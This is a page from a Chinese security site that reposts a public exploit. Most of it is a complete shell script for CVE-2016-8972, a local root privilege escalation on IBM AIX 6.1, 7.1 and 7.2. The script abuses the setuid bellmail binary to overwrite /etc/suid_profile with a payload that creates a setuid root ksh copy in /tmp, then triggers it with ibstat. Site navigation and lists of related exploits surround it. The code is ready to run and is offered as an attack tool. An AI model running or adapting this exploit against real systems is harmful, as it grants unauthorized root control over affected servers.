首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation
来源:https://www.rhinosecuritylabs.com 作者:Monsegur 发布时间:2016-12-23  
#!/usr/bin/sh
#
# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
#
# Affected versions:
# AIX 6.1, 7.1, 7.2
# VIOS 2.2.x
#
#         Fileset                Lower Level  Upper Level KEY
#        ---------------------------------------------------------
#        bos.net.tcp.client       6.1.9.0      6.1.9.200   key_w_fs
#        bos.net.tcp.client       7.1.3.0      7.1.3.47    key_w_fs
#        bos.net.tcp.client       7.1.4.0      7.1.4.30    key_w_fs
#        bos.net.tcp.client_core  7.2.0.0      7.2.0.1     key_w_fs
#        bos.net.tcp.client_core  7.2.1.0      7.2.1.0     key_w_fs
#
# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
 
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
VULNBIN=/usr/bin/bellmail
SUIDPROFILE=/etc/suid_profile
 
function ESCALATE
{
    echo "[*] Preparing escalation"
 
    $VULNBIN >/dev/null 2>&1 <<EOD
s /etc/suid_profile
EOD
 
    if [ ! -w $SUIDPROFILE ]; then
        echo "[-] $SUIDPROFILE is not writable. Exploit failed."
        exit 1
    fi
 
    echo "[*] Clearing out $SUIDPROFILE"
    echo > /etc/suid_profile
 
    echo "[*] Injecting payload"
    cat << EOF >$SUIDPROFILE
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm -f $SUIDPROFILE
EOF
 
    echo "[*] Executing SUID to leverage privileges"
    /usr/bin/ibstat -a >/dev/null 2>&1
 
    if [ ! -x $ROOTSHELL ]; then
        echo "[-] Root shell does not exist or is not executable. Exploit failed."
        exit 1
    fi
 
    echo "[*] Escalating to root.."
    $ROOTSHELL
    echo "[*] Make sure to remove $ROOTSHELL"
}
 
echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
 
$VULNBIN -e
if [ $? -eq 0 ]
    then
        ESCALATE
        echo "[*] Make sure to remove $ROOTSHELL"
        exit 0
fi
 
echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
/usr/bin/mail nonexistentuser <<EOD
.
.
.
EOD
 
echo "[*] Waiting for mail to come in."
 
while true
do
    $VULNBIN -e
    if [ $? -eq 0 ]
        then
            echo "[*] Mail found"
            ESCALATE
            break
        else
            echo "[-] Mail not received yet. Sleeping."
            sleep 10
        fi
done
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·at(1) Persistence Module
·macOS 10.12.1 Kernel - Writabl
·NETGEAR WNR2000v5 - Remote Cod
·Vesta Control Panel 0.9.8-16 -
·Microsoft Edge - International
·macOS 10.12 - Double vm_deallo
·Microsoft Edge - SIMD.toLocale
·macOS < 10.12.2 / iOS < 10.2 K
·Microsoft Internet Explorer 11
·macOS < 10.12.2 / iOS < 10.2 -
·Google Chrome < 31.0.1650.48 -
·macOS 10.12.1 / iOS < 10.2 - p
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved